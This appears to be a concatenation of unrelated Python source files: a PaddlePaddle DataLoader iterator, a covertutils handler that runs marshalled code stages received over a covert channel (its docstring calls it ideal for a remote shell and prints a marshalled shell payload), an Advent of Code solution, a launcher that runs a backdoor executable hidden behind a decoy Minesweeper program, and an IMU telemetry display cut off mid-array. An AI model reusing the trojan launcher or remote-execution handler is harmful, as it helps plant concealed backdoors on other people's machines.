self._blocking_queue.kill()
self._thread = None
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def __next__(self):
try:
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
return data
except StopIteration:
self._reader.shutdown()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep order mode holds sub-threads
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._worker_init_fn, i, self._num_workers,
self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices is generated infinitely
# for each worker to raise StopIteration, but a StopIteration
# raising process will discard a batch indices which is count
# in _send_idx but will not increase _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
sys.stdout.flush()
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers, if batches among workers drained, there
# may also be data in blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_STATUS_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker get StopIteraion, we shutdown this worker,
# note that this batch indices to trigger StopIteration
# is discard, outstanding batch number should be decrease
# and another indices should be put for other workers
# may still working.
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in main process(for our implement has blocking queue,
# and blocking queue read is in main process) and thread, which may
# cause error following error
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-enter in increase _send_idx
# add a lock for threading save, for _try_put_indices is only a slight
# function which is not in data reading pipeline, this lock almost no
# influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
functiondict.py
|
# from abc import ABCMeta, abstractmethod
from covertutils.exceptions import *
from covertutils.handlers import BaseHandler
from covertutils.helpers import defaultArgMerging
import marshal, types
from threading import Thread
# from multiprocessing import Queue
try:
from queue import Queue # Python 3
except ImportError:
from queue import Queue # Python 2
class FunctionDictHandler( BaseHandler ) :
"""
This class provides a per-stream function dict.
If a message is received from a `stream`, a function corresponding to this particular stream will be executed with single argument the received message.
The function's return value will be sent across that stream to the message's sender.
Ideal for simple `remote shell` implementation.
The FunctionDictHandler class implements the `onMessage()` function of the BaseHandler class.
The `function_dict` passed to this class `__init__()` must have the above format:
.. code:: python
def os_echo( message ) :
from os import popen
resp = popen( "echo %s" % 'message' ).read()
return resp
function_dict = { 'echo' : os_echo }
Note: The functions must be **absolutely self contained**. In the above example the `popen()` function is imported inside the `os_echo`. This is to ensure that `popen()` will be available, as there is no way to tell if it will be imported from the handler's environment.
Well defined functions for that purpose can be found in :mod:`covertutils.payloads`. Also usable for the :class:`StageableHandler` class
.. code:: python
from covertutils.payloads import GenericStages
pprint( GenericStages )
{'shell': {'function': <function __system_shell at 0x7fc347472320>,
'marshal': 'c\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x00\\x00C\\x00\\x00\\x00s&\\x00\\x00\\x00d\\x01\\x00d\\x02\\x00l\\x00\\x00m\\x01\\x00}\\x01\\x00\\x01|\\x01\\x00|\\x00\\x00\\x83\\x01\\x00j\\x02\\x00\\x83\\x00\\x00}\\x02\\x00|\\x02\\x00S(\\x03\\x00\\x00\\x00Ni\\xff\\xff\\xff\\xff(\\x01\\x00\\x00\\x00t\\x05\\x00\\x00\\x00popen(\\x03\\x00\\x00\\x00t\\x02\\x00\\x00\\x00osR\\x00\\x00\\x00\\x00t\\x04\\x00\\x00\\x00read(\\x03\\x00\\x00\\x00t\\x07\\x00\\x00\\x00messageR\\x00\\x00\\x00\\x00t\\x06\\x00\\x00\\x00result(\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00s\\x15\\x00\\x00\\x00covertutils/Stages.pyt\\x0e\\x00\\x00\\x00__system_shell\\x04\\x00\\x00\\x00s\\x06\\x00\\x00\\x00\\x00\\x01\\x10\\x01\\x12\\x01'}}
"""
# __metaclass__ = ABCMeta
def __init__( self, recv, send, orchestrator, **kw ) :
"""
:param dict function_dict: A dict containing `(stream_name, function)` tuples. Every time a message is received from `stream_name`, `function(message)` will be automatically executed.
"""
super( FunctionDictHandler, self ).__init__( recv, send, orchestrator, **kw )
self.stage_storage = {}
self.stage_storage['COMMON'] = {}
self.stage_storage['COMMON']['handler'] = self
self.processed_responses = Queue()
# try :
# self.function_dict = kw['function_dict']
for stream, stage in list(kw['function_dict'].items()) :
self.addStage( stream, stage )
# except :
# raise NoFunctionAvailableException( "No Function dict provided to contructor" )
def onMessage( self, stream, message ) :
"""
:raises: :exc:`NoFunctionAvailableException`
"""
super( FunctionDictHandler, self ).onMessage( stream, message )
# print message
self.stage_storage[stream]['queue'].put( message )
# print "Put to Queue"
ret = self.processed_responses.get(True)
# print "Processed: "+ret
return ret
def onChunk( self, stream, message ) : pass
def onNotRecognised( self ) : pass
def stageWorker( self, init, worker, storage ) :
# print "Handler: Worker Started"
if not init(storage) : return
# print "Handler: Init Run Started"
while storage['on'] :
# print "Try to GET from Queue"
message = storage['queue'].get( block = True )
# print "Handler: Work() Run"
ret = worker(storage, message)
# print ret, type(ret)
self.processed_responses.put( ret )
self.stage_storage[stream] = {}
def getStage( self, stage_obj ) :
# Recognize the type of stage
# Assume 'marshal' for now
stage_dict = marshal.loads( stage_obj )
# print stage_dict
# print stage_dict['init']
if stage_dict['init'] == None :
stage_init = _dummy_init
else :
stage_init = types.FunctionType(stage_dict['init'], globals(), "stage_init_func")
stage_work = types.FunctionType(stage_dict['work'], globals(), "stage_work_func")
# print stage_init
return stage_init, stage_work
def addStage( self, stream, stage_obj ) :
self.stage_storage[stream] = {}
self.stage_storage[stream]['queue'] = Queue()
self.stage_storage[stream]['on'] = True
self.stage_storage[stream]['stream'] = stream
self.stage_storage[stream]['COMMON'] = self.stage_storage['COMMON']
# print stream
stage_init, stage_worker = self.getStage( stage_obj )
self.orchestrator.addStream( stream )
stage_thread = Thread( target = self.stageWorker, args = ( stage_init, stage_worker, self.stage_storage[stream] ) )
stage_thread.daemon = True
stage_thread.start()
pass
def _dummy_init (storage) :
return True
|
solution.py
|
import threading
from typing import List, Tuple
from solutions.helpers import IntCodeApplication
def part_one(data: List[int]) -> int:
"""Test the Emergency Hull Painting Robot by running its application."""
canvas = {}
application = IntCodeApplication(
application=data,
name="Painting App",
flexible_memory=True,
)
pipe_in = application.stdin
pipe_out = application.stdout
robot = threading.Thread(target=application.run)
robot.start()
location = complex(0, 0)
direction = complex(0, 1)
while robot.is_alive():
pipe_in.put(canvas.get(location, 0))
canvas[location] = pipe_out.get()
direction *= complex(0, 1 - 2*pipe_out.get())
location += direction
return len(canvas)
def part_two(data: List[int]) -> int:
"""Paint a Registration Identifier on my Spaceship to please the Space police."""
canvas = {complex(0, 0): 1}
application = IntCodeApplication(
application=data,
name="Painting App",
flexible_memory=True,
)
pipe_in = application.stdin
pipe_out = application.stdout
robot = threading.Thread(target=application.run)
robot.start()
location = complex(0, 0)
direction = complex(0, 1)
while robot.is_alive():
pipe_in.put(canvas.get(location, 0))
canvas[location] = pipe_out.get()
direction *= complex(0, 1 - 2*pipe_out.get())
location += direction
x_min, x_max = min(c.real for c in canvas), max(c.real for c in canvas)
y_min, y_max = min(c.imag for c in canvas), max(c.imag for c in canvas)
panels = [[' ']*int(x_max-x_min+1) for _ in range(int(y_min), int(y_max)+1)]
for coordinate, color in canvas.items():
x, y = int(coordinate.real)-int(x_min), int(coordinate.imag) - int(y_min)
panels[y][x] = ' ' if color == 0 else "\u25AF"
return "\n".join("".join(row) for row in reversed(panels))
def main(data: List[str]) -> Tuple[int]:
"""The main function taking care of parsing the input data and running the solutions."""
data = [int(number) for number in data[0].split(",")]
answer_one = part_one(data)
answer_two = part_two(data)
return answer_one, "\n" + answer_two
|
launcher.py
|
import os
import threading
scriptpath = "C:/Users/..." # MODIFY ME -> this will be the backdoor (clientwin.exe)
exepath = "C:/Users/..." # MODIFY ME -> this will be the fron program (minesweeper.exe)
backupexe = "C:/Users/..." # MODIFY ME -> this will be bacup.exe or b2.exe
def front():
os.startfile(exepath)
def back():
os.startfile(scriptpath)
def main():
os.startfile(backupexe)
bThread = threading.Thread(target = back)
bThread.daemon = True
bThread.start()
front()
if __name__ == "__main__":
main()
|
imudisplay.py
|
#!/usr/bin/env python3
'''
imudisplay.py - graphical demo of MSPPG Attitude messages
Copyright (C) Alec Singer and Simon D. Levy 2015
This code is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This code is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this code. If not, see <http:#www.gnu.org/licenses/>.
'''
FMUPORT = '/dev/ttyUSB0'
#FMUPORT = 'COM3'
VEHICLE_SCALE = 0.10
UPDATE_MSEC = 10
import tkinter
import threading
import serial
import msppg
from math import sin, cos, radians, degrees
import numpy as np
class Display(object):
def __init__(self, driver, simulation=False):
self.driver = driver
self.width = int(self.driver.canvas['width'])
self.height = int(self.driver.canvas['height'])
self.driver.root.bind("<Key>", self._check_quit)
self.driver.root.title('IMU Telemetry')
# Vehicle dimensions
W = VEHICLE_SCALE
D = VEHICLE_SCALE / 2
L = VEHICLE_SCALE * 2
#Let these be in World-coordinates (worldview-matrix already applied)
####In right-handed, counter-clockwise order
self.vehicle_points, self.vehicle_faces, self.vehicle_face_colors = self._get_vehicle(W, D, L)
# Assume no angles to start
self.yaw_pitch_roll = None
# Rotation matrices
self.pitchrot = np.eye(3)
self.yawrot = np.eye(3)
self.rollrot = np.eye(3)
self.simulation = simulation
self.running = False
def start(self, delay_msec=UPDATE_MSEC):
self._schedule_display_task(delay_msec)
self.running = True
self.faces = []
self.yaw_pitch_roll_prev = None
self.yaw_pitch_roll_change = None
def stop(self):
self._clear()
self.running = False
def setParams(self, pitchroll_kp_percent, yaw_kp_percent):
self.pitchroll_kp_percent = pitchroll_kp_percent
self.yaw_kp_percent = yaw_kp_percent
self._set_sliders()
def _schedule_display_task(self, delay_msec):
self.driver.root.after(delay_msec, self._task)
def _clear(self):
for face in self.faces:
self.driver.canvas.delete(face)
self.faces = []
def _task(self):
if self.running:
self.yaw_pitch_roll = self.driver.getYawPitchRoll()
self._update()
self._schedule_display_task(UPDATE_MSEC)
def _to_screen_coords(self, pv):
dims = [int(s) for s in str(self.driver.root.geometry()).split('+')[0].split('x')]
width, height = dims[0], dims[1]
SC = np.eye(4)
SC[0,0] = width/2
SC[1,1] = -height/2
SC[0,3] = width/2
SC[1,3] = height/2
x = SC[0,0]*pv[0]+SC[0,1]*pv[1]+SC[0,2]*pv[2]+SC[0,3]
y = SC[1,0]*pv[0]+SC[1,1]*pv[1]+SC[1,2]*pv[2]+SC[1,3]
z = SC[2,0]*pv[0]+SC[2,1]*pv[1]+SC[2,2]*pv[2]+SC[2,3]
return np.array([x, y, z])
def _create_window(self, x, widget):
return self.driver.canvas.create_window(x, 10, anchor=tkinter.NW, window=widget)
def _check_quit(self, event):
if ord(event.char) == 27: # ESC
exit(0)
def _update(self):
# Erase previous image
self._clear()
# Convert angles to X,Y,Z rotation matrices
yawAngle = radians(self.yaw_pitch_roll[0])
self.yawrot[0,0] = +cos(yawAngle)
self.yawrot[0,2] = +sin(yawAngle)
self.yawrot[2,0] = -sin(yawAngle)
self.yawrot[2,2] = +cos(yawAngle)
pitchAngle = radians(self.yaw_pitch_roll[1])
self.pitchrot[1,1] = +cos(pitchAngle)
self.pitchrot[1,2] = -sin(pitchAngle)
self.pitchrot[2,1] = +sin(pitchAngle)
self.pitchrot[2,2] = +cos(pitchAngle)
rollAngle = -radians(self.yaw_pitch_roll[2]) # negate so positive is roll rightward
self.rollrot[0,0] = +cos(rollAngle)
self.rollrot[0,1] = -sin(rollAngle)
self.rollrot[1,0] = +sin(rollAngle)
self.rollrot[1,1] = +cos(rollAngle)
# Multiply matrices
rot = np.dot(np.dot(self.yawrot, self.pitchrot), self.rollrot)
# Draw polygons
for i in range(len(self.vehicle_faces)):
poly = [] #transformed polygon
for j in range(len(self.vehicle_faces[0])):
v = self.vehicle_points[self.vehicle_faces[i][j]]
# Transform the point from 3D to 2D
ps = np.dot(v, rot.T)
p = self._to_screen_coords(ps)
# Put the screenpoint in the list of transformed vertices
poly.append((p[0], p[1]))
if self._is_polygon_front_face(poly): #Backface culling
self.faces.append(self.driver.canvas.create_polygon(*poly, fill=self.vehicle_face_colors[i]))
# Update angle changes
if not self.yaw_pitch_roll_prev is None:
self.yaw_pitch_roll_change = [degrees(abs(pair[0]-pair[1]))
for pair in zip(self.yaw_pitch_roll,self.yaw_pitch_roll_prev)]
self.yaw_pitch_roll_prev = self.yaw_pitch_roll
def _is_polygon_front_face(self, pts):
summa = 0.0
num = len(pts)
for i in range(num-1):
summa += (pts[i+1][0]-pts[i][0])*(pts[i+1][1]+pts[i][1])
summa += (pts[0][0]-pts[num-1][0])*(pts[0][1]+pts[num-1][1])
return summa > 0.0
def _get_vehicle(self, width, depth, length):
#creates constants
length = width
#arm constants
armLength = width*2
armWidth = armLength/10
#arrow constants
arrowWidth = 1.0 * armWidth
arrowLength = 5.0 * armWidth
arrowHeight = 1.5 * depth
#prop constants
propWidth = 1.00 * armWidth
propNarrowWidth = 0.20 * propWidth
propLength = 7.50 * propWidth
propNarrowLength = 0.75 * propLength
propShortLength = 0.25 * propLength
#prop pitch constants
tipTU = 0.900 * depth
tipTL = 0.625 * depth
tipBU = 0.625 * depth
tipBL = 0.350 * depth
endT = .75 * depth
endB = .50 * depth
constant1 = ((endT-tipTL)/3) * depth
constant2 = ((endB-tipBL)/3) * depth
farTU = tipTU - constant2
farTL = tipTL + constant1
farBU = tipBU - constant1
farBL = tipBL + constant2
closeTU = farTU - constant2
closeTL = farTL + constant1
closeBU = farBU - constant1
closeBL = farBL + constant2
points = np.array([
#creates arm 1
[+width - armWidth, +depth/2 , +length + armWidth], #0 0
[+width + armWidth, +depth/2 , +length - armWidth], #1 1
[+width + armWidth, -depth/2 , +length - armWidth], #2 2
[+width - armWidth, -depth/2 , +length + armWidth], #3 3
[+width + armLength - armWidth, +depth/2 , +length + armLength + armWidth], #4 4
[+width + armLength + armWidth, +depth/2 , +length + armLength - armWidth], #5 5
[+width + armLength + armWidth, -depth/2 , +length + armLength - armWidth], #6 6
[+width + armLength - armWidth, -depth/2 , +length + armLength + armWidth], #7 7
#creates arm 2
[-width - armWidth, +depth/2 , +length - armWidth], #0 8
[-width + armWidth, +depth/2 , +length + armWidth], #1 9
[-width + armWidth, -depth/2 , +length + armWidth], #2 10
[-width - armWidth, -depth/2 , +length - armWidth], #3 11
[-width - armLength - armWidth, +depth/2 , +length + armLength - armWidth], #4 12
[-width - armLength + armWidth, +depth/2 , +length + armLength + armWidth], #5 13
[-width - armLength + armWidth, -depth/2 , +length + armLength + armWidth], #6 14
[-width - armLength - armWidth, -depth/2 , +length + armLength - armWidth], #7 15
#creates arm 3
[+width + armLength - armWidth, +depth/2 , -length - armLength - armWidth], #0 16
[+width + armLength + armWidth, +depth/2 , -length - armLength + armWidth], #1 17
[+width + armLength + armWidth, -depth/2 , -length - armLength + armWidth], #2 18
[+width + armLength - armWidth, -depth/2 , -length - armLength - armWidth], #3 19
[+width - armWidth, +depth/2 , -length - armWidth], #4 20
[+width + armWidth, +depth/2 , -length + armWidth], #5 21
[+width + armWidth, -depth/2 , -length + armWidth], #6 22
[+width - armWidth, -depth/2 , -length - armWidth], #7 23
#creates arm 4
[-width - armLength - armWidth, +depth/2 , -length - armLength + armWidth], #0 24
[-width - armLength + armWidth, +depth/2 , -length - armLength - armWidth], #1 25
[-width - armLength + armWidth, -depth/2 , -length - armLength - armWidth], #2 26
[-width - armLength - armWidth, -depth/2 , -length - armLength + armWidth], #3 27
[-width - armWidth, +depth/2 , -length + armWidth], #4 28
[-width + armWidth, +depth/2 , -length - armWidth], #5 29
[-width + armWidth, -depth/2 , -length - armWidth], #6 30
[-width - armWidth, -depth/2 , -length + armWidth], #7 31
#creates the arrow body
[-arrowWidth, +arrowHeight, 0], #0 32
[+arrowWidth, +arrowHeight, 0], #1 33
[+arrowWidth, +depth, 0], #2 34
[-arrowWidth, +depth, 0], #3 35
[-arrowWidth, +arrowHeight, +arrowLength], #4 36
[+arrowWidth, +arrowHeight, +arrowLength], #5 37
[+arrowWidth, +depth, +arrowLength], #6 38
[-arrowWidth, +depth, +arrowLength], #7 39
#creates the arrow head
[-(1/6)*arrowWidth, +arrowHeight, -arrowLength], #0 40
[+(1/6)*arrowWidth, +arrowHeight, -arrowLength], #1 41
[+(1/6)*arrowWidth, +depth, -arrowLength], #2 42
[-(1/6)*arrowWidth, +depth, -arrowLength], #3 43
[-arrowWidth - 2*arrowWidth, +arrowHeight, 0], #4 44
[+arrowWidth + 2*arrowWidth, +arrowHeight, 0], #5 45
[+arrowWidth + 2*arrowWidth, +depth, 0], #6 46
[-arrowWidth - 2*arrowWidth, +depth, 0], #7 47
#creates the center box
[-width - armWidth, +depth, -length + armWidth], #0 48
[-width + armWidth, +depth, -length - armWidth], #1 49
[+width - armWidth, +depth, -length - armWidth], #2 50
[+width + armWidth, +depth, -length + armWidth], #3 51
[+width - armWidth, -depth, -length - armWidth], #4 52
[+width + armWidth, -depth, -length + armWidth], #5 53
[-width - armWidth, -depth, -length + armWidth], #6 54
[-width + armWidth, -depth, -length - armWidth], #7 55
[-width - armWidth, +depth, +length - armWidth], #8 56
[-width + armWidth, +depth, +length + armWidth], #9 57
[+width - armWidth, +depth, +length + armWidth], #10 58
[+width + armWidth, +depth, +length - armWidth], #11 59
[+width - armWidth, -depth, +length + armWidth], #12 60
[+width + armWidth, -depth, +length - armWidth], #13 61
[-width - armWidth, -depth, +length - armWidth], #14 62
[-width + armWidth, -depth, +length + armWidth], #15 63
#creates prop 1 on arm 1
#North East far narrow tip
[+width+armLength + propLength - propNarrowWidth, +tipTL, +length+armLength - propLength - propNarrowWidth], #0 64
[+width+armLength + propLength + propNarrowWidth, +tipTU, +length+armLength - propLength + propNarrowWidth], #1 65
[+width+armLength + propLength + propNarrowWidth, +tipBU, +length+armLength - propLength + propNarrowWidth], #2 66
[+width+armLength + propLength - propNarrowWidth, +tipBL, +length+armLength - propLength - propNarrowWidth], #3 67
#North East far wide
[+width+armLength + propNarrowLength - propWidth, +farTL, +length+armLength - propNarrowLength - propWidth], #4 68
[+width+armLength + propNarrowLength + propWidth, +farTU, +length+armLength - propNarrowLength + propWidth], #5 69
[+width+armLength + propNarrowLength + propWidth, +farBU, +length+armLength - propNarrowLength + propWidth], #6 70
[+width+armLength + propNarrowLength - propWidth, +farBL, +length+armLength - propNarrowLength - propWidth], #7 71
#North East close wide
[+width+armLength + propShortLength - propWidth, +closeTL, +length+armLength - propShortLength - propWidth], #4 72
[+width+armLength + propShortLength + propWidth, +closeTU, +length+armLength - propShortLength + propWidth], #5 73
[+width+armLength + propShortLength + propWidth, +farBU, +length+armLength - propShortLength + propWidth], #6 74
[+width+armLength + propShortLength - propWidth, +farBL, +length+armLength - propShortLength - propWidth], #7 75
#Middle narrow tip
[+width+armLength - propNarrowWidth, +endT, +length+armLength - propNarrowWidth], #4 76
[+width+armLength + propNarrowWidth, +endT, +length+armLength + propNarrowWidth], #5 77
[+width+armLength + propNarrowWidth, +endB, +length+armLength + propNarrowWidth], #6 78
[+width+armLength - propNarrowWidth, +endB, +length+armLength - propNarrowWidth], #7 79
#South West close wide
[+width+armLength - propShortLength - propWidth, +closeTU, +length+armLength + propShortLength - propWidth], #4 80
[+width+armLength - propShortLength + propWidth, +closeTL, +length+armLength + propShortLength + propWidth], #5 81
[+width+armLength - propShortLength + propWidth, +closeBL, +length+armLength + propShortLength + propWidth], #6 82
[+width+armLength - propShortLength - propWidth, +closeBU, +length+armLength + propShortLength - propWidth], #7 83
#South West far wide
[+width+armLength - propNarrowLength - propWidth, +farTU, +length+armLength + propNarrowLength - propWidth], #4 84
[+width+armLength - propNarrowLength + propWidth, +farTL, +length+armLength + propNarrowLength + propWidth], #5 85
[+width+armLength - propNarrowLength + propWidth, +farBL, +length+armLength + propNarrowLength + propWidth], #6 86
[+width+armLength - propNarrowLength - propWidth, +farBU, +length+armLength + propNarrowLength - propWidth], #7 87
#South West far narrow tip
[+width+armLength - propLength - propNarrowWidth, +tipTU, +length+armLength + propLength - propNarrowWidth], #0 88
[+width+armLength - propLength + propNarrowWidth, +tipTL, +length+armLength + propLength + propNarrowWidth], #1 89
[+width+armLength - propLength + propNarrowWidth, +tipBL, +length+armLength + propLength + propNarrowWidth], #2 90
[+width+armLength - propLength - propNarrowWidth, +tipBU, +length+armLength + propLength - propNarrowWidth], #3 91
#creates prop 4 on arm 4
#North East far narrow tip
[-width-armLength + propLength - propNarrowWidth, +tipTL, -length-armLength - propLength - propNarrowWidth], #0 92
[-width-armLength + propLength + propNarrowWidth, +tipTU, -length-armLength - propLength + propNarrowWidth], #1 93
[-width-armLength + propLength + propNarrowWidth, +tipBU, -length-armLength - propLength + propNarrowWidth], #2 94
[-width-armLength + propLength - propNarrowWidth, +tipBL, -length-armLength - propLength - propNarrowWidth], #3 95
#North East far wide
[-width-armLength + propNarrowLength - propWidth, +farTL, -length-armLength - propNarrowLength - propWidth], #4 96
[-width-armLength + propNarrowLength + propWidth, +farTU, -length-armLength - propNarrowLength + propWidth], #5 97
